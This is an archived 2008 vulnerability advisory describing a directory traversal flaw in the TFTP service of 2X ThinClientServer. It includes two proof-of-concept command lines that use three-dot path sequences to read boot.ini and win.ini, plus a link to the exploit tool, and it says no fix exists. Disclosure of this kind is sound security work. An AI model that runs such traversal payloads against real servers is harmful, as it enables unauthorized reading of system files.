Directory traversal in 2X ThinClientServer v5.0_sp1-r3497

2008-04-01T00:00:00
ID SECURITYVULNS:DOC:19546
Type securityvulns
Reporter Securityvulns
Modified 2008-04-01T00:00:00

Description

                         Luigi Auriemma

Application: 2X ThinClientServer http://www.2x.com/thinclientserver/ Versions: <= v5.0_sp1-r3497 (TFTPd.exe <= 3.2.0.0) Platforms: Windows Bug: directory traversal Exploitation: remote Date: 29 Mar 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org

1) Introduction 2) Bug 3) The Code 4) Fix

=============== 1) Introduction ===============

From the manual: "2X ThinClientServer allows you to deploy a thin client OS to low-cost thin client devices and existing PCs, and centrally manage settings and configure to which terminal servers (Windows or Linux) a user should log on to."

====== 2) Bug ======

The 2X TFTP Service enabled by default in ThinClientServer is affected by a directory traversal vulnerability exploitable through the usage of a sequence of 3 dots (instead of the classical two) for reaching the various parent directories.

=========== 3) The Code ===========

http://aluigi.org/testz/tftpx.zip

tftpx SERVER .../.../.../.../.../.../boot.ini none tftpx SERVER ...\...\...\...\...\...\windows\win.ini none

====== 4) Fix ======

No fix


Luigi Auriemma http://aluigi.org